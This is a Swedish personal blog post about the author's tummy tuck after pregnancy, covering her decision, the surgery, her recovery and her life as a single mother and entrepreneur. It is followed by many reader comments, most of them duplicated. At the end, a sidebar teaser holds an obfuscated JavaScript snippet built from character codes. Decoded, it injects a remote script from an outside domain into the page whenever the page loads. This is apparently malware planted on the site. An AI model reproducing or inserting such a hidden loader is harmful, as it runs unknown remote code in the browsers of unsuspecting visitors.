Nu kommer efterbilderna som ni så många har väntat på : BUKPLASTIK! Före, under tiden och EFTER bilder! Om du är känslig för obehagliga bilder så kikar du inte in på detta inlägg…

hej vänner!

_MG_0738

Nu äntligen kommer bilderna och uppdateringen som sååååååå många  har väntat på! 

Bilder inför, under och EFTER min bukplastik. 

 Det tog mig flera år att bestämma mig, men tillslut gjorde jag det.

Jag hade då funderat på detta under TRE års tid. Jag sökte efter information på nätet, gick på x-antal konsultationer innan jag tillslut tog beslutet och bestämde mig. 

 X-antal veckor efter graviditeten vägde jag fortfarande nästan 100 kg!?! Bukmuskelaturen hade spruckit  och jag hade efter viktnedgången jätte mycket överflödig hud och extrema bristningar…

När jag väl hade tagit beslutet så valde jag att gå ut med det, då jag själv sökt mycket info kring just bukplastiker på nätet men uppfattat att det varit mycket ”hysch hysch” kring det och ingenting man egentligen pratar om…

Det var just det som blev anledningen till att  jag att själv valde att gå ut med det. Men Jag måste erkänna att jag var livrädd för vad DU skulle tycka och tvekade många gånger innan jag tillslut samlade mod till mig och publicerade inlägget.

Detta inlägget kan du läsa HÄR

OM du är känslig för obehagliga bilder så ska du INTE skrolla längre ner! 

Efter en vikt på strax under 100kg (ja du läste rätt jag vägde nästa 100kg!!!) En viktminskning pga utav stress och sorg efter separation från Ludvigs pappa gjorde att jag rasade i vikt…. Huden hängde INTE med! Jag tog tag i mig själv och började träna med PT. Jag slet som ett djur, ville bli stark på både in och utsida. 

MEN med mina fruktansvärda bristningar och en sprucken bukmuskelatur på ca 6.5cm så hade det inte spelat någon roll hur mycket jag tränade jag hade ALDRIG kunnat använda magmusklerna igen och heller inte kunnat träna på den nivå som jag vill….

Jag jobbar numera med en hel del fotograferingar, och känner mig trygg med kläderna på, magen har jag kunnat dölja med kläder, bodys och mormors-trosor, -Jag har blivit en expert på just det! 😉

Men naken framför spegeln eller på stranden i bikini tex kände jag mig verkligen inte bekväm…..

image510

Såhär såg det ut innan operationen:image4Foto Linda Himsel

Bristningar, överflödig hud…. Om jag stod på alla fyra så hängde magen som en påse, svårt att se på denna bilden men det var bara som en tom ”säck” Tro mig det händer att även jag står på alla fyra 😉 -hehe!

Nu syftar jag på armhävningar och yoga positioner och sånt 😉

image2

Jag vantrivdes verkligen med min mage och precis som jag skrev så tog det mig TRE hela år att bestämma mig… Nu med facit i hand så förstår jag verkligen inte att jag inte gjort det tidigare!

-jag har inte ångrat det en sekund!

Jag tycker inte att man idag på 2015-talet behöver förknippa skönhetsoperationer med förstorade läppar och bröst! Jag står inte för något skönhetsideal iform utav en ”barbie kropp” jag vill bara se sund ut, känna mig sund och trivas med mig själv…. 

Tack vare bukplastiken så gör jag det igen…

Jag anser att beslutet att göra skönhetsoperationer är upp till var och en. Jag stöttar dom som vill göra det, och jag stöttar även dom som inte vill göra det. Det är ett individuellt beslut som man har rätt att ta då det handlar o ens egna kropp…. 

-MEN man ska inte göra det för någon annans skull….

OM man som jag vantrivs med det och dessutom har en möjlighet att laga en sprucken bukmuskelatur och då alltså kan ta träningen till en annan nivå så förstår jag inte varför man inte kan göra någonting åt det?! -Om man nu verkligen vill göra det?

-herregud! Jag är 27 år gammal och singel det är väl klart att jag med större delen utav livet framför mig vill trivas och mår bra =)

-Hur ställer du dig till detta? vad är din åsikt? 

OBS!!!  Här nedan kommer dom kanske lite ”obehagliga” bilderna: Stanna här om du inte vill se!

 

 

 

Efter operatonen, skrev jag ett inlägg från uppvaket som du kan läsa HÄR

 

image136

 

Naveln är helt ny, den gamla försvann med all överflödig hud så kan du kanske få en uppfattning om hur mycket hud det faktiskt fanns att ta bort…. image138

Att sövas var ingenting som oroade mig… Jag kände mig i trygga händer på Dr Tuve Mårtensson som jag bestämde mig för på Citadell kliniken

Att vakna upp efter operationen kändes konstigt, först så är man extremt bedövad, men det gör ont! Väldigt ont! En smärta som man absolut kan hantera, men man ska ändå vara förberedd på att det känns. 

Det är självklart individuellt det också…

image157

Jag blev så väl omhändertagen utav alla sköterskor och Dr Tuve. Jag gick på morfin och smärtstillande första dagarna, vilket underlättade en hel del!

Ett tips till dig som funderar på att göra denna operationen är att boka på en extra övernattning. jag personligen stannade kvar en extra natt för att bli ompysslad…

Ett annat tips är att du INTE ska vara ensam hemma första dygnen då du behöver hjälp med precis allting!

Som du kan se så har jag ett drenage. För mig var DET var det värsta med hela operationen!

-usch vilken obehaglig känsla att ”dra ut” den långa plastslange som låg ringlad i buken som en lång orm… 

Ingen smärta, men extremt obehagligt. Men dom omtänksamma sköterskorna distraherade mig och fick det att gå lätt och smidigt..

image132

 

Såhär ser det nu ut ca fyra månader EFTER operation: 

_MG_0228 _MG_0233

Magen är fortfarande svullen… (det kommer den att vara en bra tid framåt)  Det ömmar fortfarande lite grann. Men jag är verkligen såååå nöjd! 

Det värsta med operationen var den låååånga rehabiliterings perioden. Jag hade nog inte riktigt föreställt mig hur passiv jag fick lov att vara. jag är van att jobba fysiskt och att alltid vara igång, så det blev en ordentlig utmaning! 

Första tiden efter operationen så kände jag mig väldigt vätskefylld. Jag har dessutom gått upp några kilon efter operationen, då jag fortsatte att äta som jag brukade göra innan, trots att jag inte kunnat träna. -Inte så smart 😉

Men det går ju också att göra någonting åt. =)

-Trots låååång rehabliteringstid så har jag inte ångrat mig en sekund!

Att kunna dra handen över magen utan att känna den där överflödiga huden och dom breda bristningarna som jag inte kunde förlika mig med känns HELT fantastiskt! =) 

Solbrännan ser dock inte klok ut! -haha! 

Men för att få så snygga ärr som möjligt så tejpar jag över ärren och undviker solen helt! Det får helt enkelt bli beach 2016 istället 😉 

_MG_0229

 

Jag fick några ”elaka” kommentarer, hur jag som mamma kunde göra så mot mig själv, att jag istället borde se det som något fint med min ”nya” mamma kropp. 

Men jag personligen valde att göra detta för MIN skull. Att föda barn och att bli mamma är det absolut BÄSTA som har hänt mig! Det är helt oslagbart! Det ska INTE blandas ihop med mitt beslut om att göra en bukplastik! 

För er som är nya här inne så ska jag berätta lite mer om vem jag är, Låååång historia kort! 😉

_MG_0316

Jag är ensamstående småbarns mamma till Ludvig, som jag även kallar Lilleman. Lilleman är mitt allt <3

När Lilleman var ca 10-12 veckor så kom det fram att lillemans pappa hade varit otrogen och gjort en annan kvinna gravid. Otrohets ryktena hade cirkulerat en tid men jag trodde inte på dom förrän graviditeten var ett faktum. Det blev en ordentlig livskris och jag bröt fullkomligt ihop. Vägen tillbaka blev lång… 

I början var jag bitter, jag driver My’s Blommor sida vid sida med Ludvigs pappas företag så att se den ”nya” kvinnans (då 17 år ?!) mage växa samtidigt som jag plötslig förlorade det som för mig varit min familj under många år med två fantastiska bonusbarn, hus, hund, företag och alla framtidsplaner var en ordentlig utmaning att ta sig igenom. 

Jag bestämde mig ganska tidigt för att klara av detta också, och gav mig tusan på att inte vara bitter. Tack vare det så har vi båda satt Lilleman i första hand och har idag en bra relation vad det gäller honom. Dessutom är Lilleman och hans halvsyskon som är i stort sett lika gamla  super tajta och älskar varandra oerhört mycket… <3

Varannan vecka livet är någonting som jag aldrig kommer att vänja mig vid fullt ut. jag vill såklart ha min Lilleman hos mig jämt!  Men han har inte valt denna situationen och har rätt till båda sina föräldrar. 

Så mitt bästa tips till alla i liknande situationer är att verkligen inte bli bitter! Livet är för kort för att slösa bort på bitterhet, pajkastning och ett känslokaos! Stå över den nivån och se framåt!

_MG_0269

 

Nu till något roligare…. Jag är entreprenör ut i fingerspetsarna och driver tre företag. Jag fick bli vuxen snabbt, och har bott själv, jobbat och stått på egna ben sedan 14års ålder…. jag startade mitt första företag som 18åring, och har aldrig påbörat något gymnasium, då jag varken hade råd eller möjlighet till det. Jag kan nog kalla mig maskrosbarn, men har trots min brokiga bakgrund klarat mig väldigt bra.

Jag är en fighter i mig själv och försöker att ta med mig alla erfarenheter och vända dom till något positivt…

Det har inte varit lätt, men det har format mig till den jag är idag. jag skriver just nu på en självbiografi som jag när jag är mogen för kommer att gå ut med…

Jag kommer i samband med detta att föreläsa för barn/ungdomar som också kommer från trassliga bakgrunder och förhoppningsvis kunna ge stöd, styrka och hopp om en bättre framtid, då det är så otroligt lätt att man hamnar fel i drog och missbrukar träsket!  Jag vet att man inte kan rädda hela världen, men om man kan hjälpa några vilsna själar på vägen så vill jag göra det!

11130625_688483534589090_1213327853_n

Ett utav företagen är My’s Blommor på Öland. ett Garden Center med florist avdelning som är specialiserad på just brudbinderier Jag var 18 när jag startade detta företaget.

Jag jobbar även som blomster grossist irån Holland där jag är schemalagd på plats till och från hela året runt.

Tredje företaget är bloggen som jag startade i samband med min medverkan i TV3 Ensam Mamma Söker. Jag trodde först att det var ett skämt när dom bad oss att börja blogga.

-skulle jag? som har dyslexi och skriver som en kratta? -hahaha jodå… 

Det har varit nyttigt för mig och idag älskar jag att blogga =) 

Med bloggen följer massa spännande roliga jobb och projekt.

Jag har precis gått ut offentligt med att jag är en utav Hälsokickens profiler. De 20:e Augusti åker vi iväg på en kryssning då DU har möjligheten att boka med dig för 1569:-/person.

Tanken med denna resan är att du ska få en riktig energi boost och en massa användbara tips att ta med dig hem =) Förutom att vi såklart ska umgås, äta tillsammans och ha ett fantastiskt dygn så kommer vi att träna tillsammans, lyssna på föreläsningar.. dansa med en gladiator kanske? prova på självförsvar, yoga och massa olika tränings metoder.. Alla har ju inte möjligheten att lämna familj/barn hemma och åka på en träningsresa på 1-2 veckor som brukar börja på ca 13-14 tusen. Då är detta ett perfekt allternativ! -Hoppas du vill följa med? =)

Du kan läsa mer om uppläget och hur du bokar på Hälsokicken hemsida HÄR10336600_935571336481361_6112215695133118029_n

Nu när jag äntligen har fått klartecken att få börja träna igen efter min långa rehabilitering så har jag precis påbörjat ett samarbete med en utav hälsokicken profiler, PT Natahlie Rosenberg =)

Så i samma takt som jag själv kommer igång med träningen så kommer det naturligt bli mer träning, kost, pepp och energi här inne =) 

-För visst måste vi  peppa varandra?  😉

image

Nu blev detta ett ganska långt och ”spretigt” inlägg, men då det är många nya läsas just nu så ville jag bara ge en kort bakgrund =) 

-Tveka inte på att ställa mig frågor om det är någonting du undrar över… 

Kramar /my Martens

 

 

86 Komentarer

 1. Verkligen snygg blev din mage. Och för övrigt säger jag, heja dig My. Du har kämpat för din tillvaro och jag beundrar dig ?

 2. Hej, vad fint det blivit! Funderar själv på att göra en sådan operation i framtiden. Jag undrar dock, förstörs något om du skulle bli gravid igen eller är allt som vanligt? Några risker? Kram

  • har gjort en stor buk och en korrigering, är nu gravid med mitt första. det du ”riskerar” är att töja ut huden igen.
   men de jag märkt på mig och på många andra är att gravidmagen inte blir så stor.

 3. Jag skulle vilja fråga vart du gör ditt hår? ? vilken metod & hur mycket du ger för det! Du är skit snygg förövrigt

 4. Åh My du är underbar önskar dig bara all gott i framtiden.
  Du är enastående tycker det är bra att du visar före och efter bilder.
  Skulle själv behöva göra mina ögonbryn dom hänger som tunga skyar ner över ögonen men vet inte vad man ska kontakta.
  Har du nån bra klinik som man kan anlita är jag väldig tacksam
  MY DU är underbar
  Kram

 5. Hej My! Jag har följt dig sedan ensam manma söker och ville bara säga att du berör verkligen. Jag tycker att du verkar var en superstark och trygg person som man vill ha i sin närhet. Önskar dig det bästa i framtiden och tack för en så öppen och härlig blogg!!

 6. Verkligen snygg blev din mage. Och för övrigt säger jag, heja dig My. Du har kämpat för din tillvaro och jag beundrar dig 🙂

 7. Hej, vad fint det blivit! Funderar själv på att göra en sådan operation i framtiden. Jag undrar dock, förstörs något om du skulle bli gravid igen eller är allt som vanligt? Några risker? Kram

  • har gjort en stor buk och en korrigering, är nu gravid med mitt första. det du ”riskerar” är att töja ut huden igen.
   men de jag märkt på mig och på många andra är att gravidmagen inte blir så stor.

 8. Jag skulle vilja fråga vart du gör ditt hår? 🙂 vilken metod & hur mycket du ger för det! Du är skit snygg förövrigt

 9. Åh My du är underbar önskar dig bara all gott i framtiden.
  Du är enastående tycker det är bra att du visar före och efter bilder.
  Skulle själv behöva göra mina ögonbryn dom hänger som tunga skyar ner över ögonen men vet inte vad man ska kontakta.
  Har du nån bra klinik som man kan anlita är jag väldig tacksam
  MY DU är underbar
  Kram

 10. Hej My! Jag har följt dig sedan ensam manma söker och ville bara säga att du berör verkligen. Jag tycker att du verkar var en superstark och trygg person som man vill ha i sin närhet. Önskar dig det bästa i framtiden och tack för en så öppen och härlig blogg!!

 11. Du är verkligen grym du My.
  Blir imponerad av hur stark du är och att du kämpat dig igenom allt.
  Fortsätt att kämpa på och ha en fin sommar med din fina son.
  Kram

 12. Hej my skulle du vara intresserad av att gå på en dejt med mig. Jag är en kille på 28 år bor i kalmar. Jag har 2 döttrar på 6 och 2 år. Hoppas på att få svar ifrån dig. Kram

 13. Du är verkligen grym du My.
  Blir imponerad av hur stark du är och att du kämpat dig igenom allt.
  Fortsätt att kämpa på och ha en fin sommar med din fina son.
  Kram

 14. Hej my skulle du vara intresserad av att gå på en dejt med mig. Jag är en kille på 28 år bor i kalmar. Jag har 2 döttrar på 6 och 2 år. Hoppas på att få svar ifrån dig. Kram

 15. Hej My Resultatet ser fantastiskt ut. Jag tycket du är super på många sätt och det är toppen att du står på dig mot nedlåtande kommentarer och tyckare. Jag gjorde själv en stor bukplastik i torsdags, så jag är just nu i början av rehabiliteringen. Smärtan har jag inga problem med, den hade jag förberett mig på och jag har ganska hög smärttröskel. Jag har lite svårt att vara still och ta emot hjälp. Det är min utmaning ? Undrar lite hur snabbt man kan börja ta små promenader? Saknar verkligen det. Är lite rädd att överanstränga mig just för att min smärttröskel är hög och jag står ut med mycket av den varan. Längtar också att får börja träna igen men ska verkligen ge kroppen läkningstiden den behöver. Tack för en toppenblogg och lycka till med alla dina projekt. Kram

 16. Hej My Resultatet ser fantastiskt ut. Jag tycket du är super på många sätt och det är toppen att du står på dig mot nedlåtande kommentarer och tyckare. Jag gjorde själv en stor bukplastik i torsdags, så jag är just nu i början av rehabiliteringen. Smärtan har jag inga problem med, den hade jag förberett mig på och jag har ganska hög smärttröskel. Jag har lite svårt att vara still och ta emot hjälp. Det är min utmaning 😉 Undrar lite hur snabbt man kan börja ta små promenader? Saknar verkligen det. Är lite rädd att överanstränga mig just för att min smärttröskel är hög och jag står ut med mycket av den varan. Längtar också att får börja träna igen men ska verkligen ge kroppen läkningstiden den behöver. Tack för en toppenblogg och lycka till med alla dina projekt. Kram

 17. Hej My!
  Efter att ha läst lite så finns det liten och stor bukplastik operation. Vilken gjorde du?
  Vad betalade du för din op? Är så sugen men vill gärna gå ner ca 5-8 kg innan dess.

 18. Hej My!
  Efter att ha läst lite så finns det liten och stor bukplastik operation. Vilken gjorde du?
  Vad betalade du för din op? Är så sugen men vill gärna gå ner ca 5-8 kg innan dess.

 19. Men verkar som mina kommentarer alltid trycks bort ?
  Vilket starkt inlägg du skrivit, du verkar vara en riktig kämpe….
  Jag tror din bok skulle vara intressant att läsa, gillar din blogg och det du skriver här.
  Skönt att höra att du mår ”bra” efter op och allt annat som ”hänt” i ditt liv =)

 20. Du har gjort helt rätt med din operation. Det har ju blivit jättefint. Hade din affär varit närmare, så hade jag nog varit där dagligen. Ser så himla fint och inspirerande ?

 21. Hej fina my, hur folk kan döma dig för operationen förstår jag inte, jag har gjort Samma resa somm du har gått ner ifrån nära 100 kg på ett halvår dock inte varit gravid eller gjort operation men jag förstår dig. Skulle du inte kunna skriva lite om hur din framtid kan se ut efter operation kan du bli gravid igen utan att förstöra operationen? en annan fråga undrar lite vilken camping du tycker är bäst och mest prisvärda på Öland ? Tack för en bra blogg!

 22. Men verkar som mina kommentarer alltid trycks bort 🙁
  Vilket starkt inlägg du skrivit, du verkar vara en riktig kämpe….
  Jag tror din bok skulle vara intressant att läsa, gillar din blogg och det du skriver här.
  Skönt att höra att du mår ”bra” efter op och allt annat som ”hänt” i ditt liv =)

 23. Fantastisk fin mage du fått. Har börjat läsa din blogg tack vare Mia i Eskilstuna (miasvitahus). Du är en otroligt stark kvinna som klarat av allt du gjort och gör trots din låga ålder. Fantastiskt.

 24. Du har gjort helt rätt med din operation. Det har ju blivit jättefint. Hade din affär varit närmare, så hade jag nog varit där dagligen. Ser så himla fint och inspirerande 🙂

 25. Är så glad för att du delat med dig av din erfarenhet, går själv i tankarna om att göra en op. Dock känner jag mig aningen rädd för smärtan och de stoppar mig från att göra de, trots att jag dagligen x antal gånger tänker va fan hände liksom? Du har verkligen fått fint resultat och jag undrar om de bara blev ett snitt nere och en ny navel? Samt. Du hade turen att få bort alla bristningar för de syns inte på bilden, ännu en oro hos mig då jag har hela vägkartan för sverige på magen att de inte kommer vara värt de. Tacksam för svar och tack för en fin blogg!

 26. Hej fina my, hur folk kan döma dig för operationen förstår jag inte, jag har gjort Samma resa somm du har gått ner ifrån nära 100 kg på ett halvår dock inte varit gravid eller gjort operation men jag förstår dig. Skulle du inte kunna skriva lite om hur din framtid kan se ut efter operation kan du bli gravid igen utan att förstöra operationen? en annan fråga undrar lite vilken camping du tycker är bäst och mest prisvärda på Öland 🙂 Tack för en bra blogg!

 27. Fantastisk fin mage du fått. Har börjat läsa din blogg tack vare Mia i Eskilstuna (miasvitahus). Du är en otroligt stark kvinna som klarat av allt du gjort och gör trots din låga ålder. Fantastiskt.

 28. Är så glad för att du delat med dig av din erfarenhet, går själv i tankarna om att göra en op. Dock känner jag mig aningen rädd för smärtan och de stoppar mig från att göra de, trots att jag dagligen x antal gånger tänker va fan hände liksom? Du har verkligen fått fint resultat och jag undrar om de bara blev ett snitt nere och en ny navel? Samt. Du hade turen att få bort alla bristningar för de syns inte på bilden, ännu en oro hos mig då jag har hela vägkartan för sverige på magen att de inte kommer vara värt de. Tacksam för svar och tack för en fin blogg!

 29. Jag tycker du gjorde helt rätt! Bry dig inte om folk som säger att man inte ska förespråka plastikingrepp utan vara en god förebild och älska sin kropp med fel och brister. Lider man av det själv och har möjlighet att göra något åt det, självklart ska man göra det! Det blev superfint. Kram

 30. Jag har noll koll på vem du är, läste Aftonbladet . Men jag förstår dig och tycker att du blev väldigt fin efter din op!
  Varför måste man se ut som skräp bara för att man blivit mamma liksom ?
  Och varför blir så många mammor sura när dom ser en ”hot mama”?
  Lös problemet och bli nöjd lr va sur och bitter ..
  Jag kommer själv göra en bukplastik efter barn nr två för jag vill känna mig fin även lättklädd på stranden. ?

 31. Jag tycker du gjorde helt rätt! Bry dig inte om folk som säger att man inte ska förespråka plastikingrepp utan vara en god förebild och älska sin kropp med fel och brister. Lider man av det själv och har möjlighet att göra något åt det, självklart ska man göra det! Det blev superfint. Kram

 32. Jag har noll koll på vem du är, läste Aftonbladet . Men jag förstår dig och tycker att du blev väldigt fin efter din op!

  Varför måste man se ut som skräp bara för att man blivit mamma liksom ?
  Och varför blir så många mammor sura när dom ser en ”hot mama”?
  Lös problemet och bli nöjd lr va sur och bitter ..
  Jag kommer själv göra en bukplastik efter barn nr två för jag vill känna mig fin även lättklädd på stranden. 🙂

 33. God morron My. Wow vilket resultat det blev. Du har gjort helt rätt, och dessutom övervägt det länge innan du fattade beslutet. Att man gör operationer/korrigeringar av sin kropp när man gått så länge som du, tycker jag är helt okej. Däremot är jag väl kanske inte lika entusiastisk när man gör det för ”skönhets” skull.
  Jag hoppas du och Lilleman får en skön sommar och att du kan vara ledig o njuta.
  Kram
  Tina

  • Tack snälla Tina <3 jag är verkligen så glad att jag gjorde det…… Nu kan jag saknat men säkert ta mig tillbaka till den tränings nivån jag vill ligga på:) ha en fin dag! Kram

 34. God morron My. Wow vilket resultat det blev. Du har gjort helt rätt, och dessutom övervägt det länge innan du fattade beslutet. Att man gör operationer/korrigeringar av sin kropp när man gått så länge som du, tycker jag är helt okej. Däremot är jag väl kanske inte lika entusiastisk när man gör det för ”skönhets” skull.
  Jag hoppas du och Lilleman får en skön sommar och att du kan vara ledig o njuta.

  Kram
  Tina

  • Tack snälla Tina <3 jag är verkligen så glad att jag gjorde det…… Nu kan jag saknat men säkert ta mig tillbaka till den tränings nivån jag vill ligga på:) ha en fin dag! Kram

 35. Hej! Vilket fantastiskt resultat. Skit i alla elaka kommentarer dom är bara avundsjuka! Jag ska göra en likvärdig operation men inte lika omfattande samt brösten. Efter tre barn är det dags att få tillbaka lite kvinnlig värdighet!

 36. Hej! Vilket fantastiskt resultat. Skit i alla elaka kommentarer dom är bara avundsjuka! Jag ska göra en likvärdig operation men inte lika omfattande samt brösten. Efter tre barn är det dags att få tillbaka lite kvinnlig värdighet!

 37. Toppen! Väldigt vackert!
  Jag har också ett barn, min älskade Philip och har fått delat mag efter graviditeten!
  Tack tack för ditt mod, hjälp och inspiration!
  Peace, love and joy.

 38. Toppen! Väldigt vackert!
  Jag har också ett barn, min älskade Philip och har fått delat mag efter graviditeten!
  Tack tack för ditt mod, hjälp och inspiration!
  Peace, love and joy.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/